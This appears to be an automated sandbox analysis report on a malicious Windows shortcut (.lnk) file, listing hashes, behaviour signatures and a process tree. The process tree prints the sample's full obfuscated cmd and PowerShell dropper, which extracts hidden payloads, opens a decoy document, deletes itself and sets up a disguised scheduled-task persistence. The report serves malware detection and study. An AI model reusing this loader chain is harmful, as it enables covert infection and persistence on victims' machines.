Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20240426-en locale:en-us os:windows10-2004-x64 system -
submitted
11/06/2024, 04:49
Static task
static1
Behavioral task
behavioral1
Sample
00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
Resource
win10v2004-20240426-en
General
-
Target
00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
-
Size
33.0MB
-
MD5
cfffb45df8f05d1cb5d9d95fd5a83e9e
-
SHA1
4f069b3c3d4ecf90a7f8a3836ac957dfcd90e944
-
SHA256
00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37
-
SHA512
5426eb64c10ee748ab2ce0aad3d2b22045c837d6aff3e6da64b9bf9645ea99ca33ab6f7d92de924996eb7879ef65e7bcb607f621bd0483d592a8778e7919a319
-
SSDEEP
768:vgAPVV/DKgF0JS3EaxNvnIBzHUUYNxHW0onSHzeN6ZC+v1ElH5qwpf2NyDkLmRvN:vtPu35RTnnSHzeNcfSfy6RvN
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3352 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation cmd.exe -
Deletes itself 1 IoCs
pid Process 3352 powershell.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5092 schtasks.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings OpenWith.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3352 powershell.exe 3352 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3352 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2252 OpenWith.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 740 wrote to memory of 2480 740 cmd.exe 81 PID 740 wrote to memory of 2480 740 cmd.exe 81 PID 740 wrote to memory of 2480 740 cmd.exe 81 PID 2480 wrote to memory of 3352 2480 cmd.exe 82 PID 2480 wrote to memory of 3352 2480 cmd.exe 82 PID 2480 wrote to memory of 3352 2480 cmd.exe 82 PID 3352 wrote to memory of 3756 3352 powershell.exe 88 PID 3352 wrote to memory of 3756 3352 powershell.exe 88 PID 3352 wrote to memory of 3756 3352 powershell.exe 88 PID 3352 wrote to memory of 3872 3352 powershell.exe 89 PID 3352 wrote to memory of 3872 3352 powershell.exe 89 PID 3352 wrote to memory of 3872 3352 powershell.exe 89 PID 3872 wrote to memory of 5092 3872 cmd.exe 90 PID 3872 wrote to memory of 5092 3872 cmd.exe 90 PID 3872 wrote to memory of 5092 3872 cmd.exe 90
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"2⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"3⤵
- Command and Scripting Interpreter: PowerShell
- Deletes itself
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\SysWOW64\expand.exe"C:\Windows\system32\expand.exe" C:\ProgramData\MicrosoftEdge\gewcdqa.cab -f:* C:\ProgramData\MicrosoftEdge4⤵
- Drops file in Windows directory
PID:3756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\MicrosoftEdge\parkonA.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 13 /tn "MicrosoftEdgeEasyUpdate" /tr "cmd /q /c \"start \"Microsoft Edge Updater\" /min \"C:\ProgramData\MicrosoftEdge\parkon.bat\" &exit\"" /f5⤵
- Creates scheduled task(s)
PID:5092
-
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2252
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
1KB
MD5 f772107c865925631a56fac02f0c9631
SHA1 cdc8ee71f01c59c3362548f751ec2803b745c6bd
SHA256 e173955f4c0d266c3a108a95eeca07c88df1810b763b1b254596e40e75177894
SHA512 4efc5babb74ed98f78b6a342290c1f7645fc49c247d4eece1c2cbe6fdb25df70ce9ca78ac0929121898e180385f575f92304c3a09a8db1fcb4af43e5a4238235
-
Filesize
2KB
MD5 a938e5c37311dabc48dc1d14c520b02a
SHA1 db9111dbb2eef7fb3482fa014bcea90c9b3df1f5
SHA256 fc13917afce9cae08c5aadfa35cf7b210208527e4d0a7f02d24eac82dc96460f
SHA512 a9e8e5f93dac1e72985719e6bbd612e90459d71f4a7b0848198346d031c3777ad02f4d13a38ccb05a03a317290dc3538cb3da032e53482d1718ce083d648b09e
-
Filesize
5KB
MD5 0d550d3c3fcc95dc191a9cb56f8d7fea
SHA1 e557278ee060b09fa227a0b9ef144e021763ecd5
SHA256 16ccd83a5c3d0e686491e7f7f650a7199d6add01c25fe587bf81b1e43575f564
SHA512 219d9f06cab7289935d1fc3476d41218b7910cce9fa9c60eda129d430b7f6d30e58a9619cfd6f93da9b1fde3c7f7d07383ecd174fcf2c98618ac75bbb804ca60
-
Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5 bce6d6994700a3e05b4a22e3381a4d36
SHA1 6d3b8fd8c18f1daad940d3589890054fe5ff21b1
SHA256 623bda38e2790240ae31383db173ded9d295aa484f653ed4f1329174bbaf6154
SHA512 3dff495bfdb146ab244faefd7ea5944836bddf03732a2402f82b7d09cc45292a43f3188527c9099e216b50279507bfdadd0689c2bf44237a1cbea9123016558e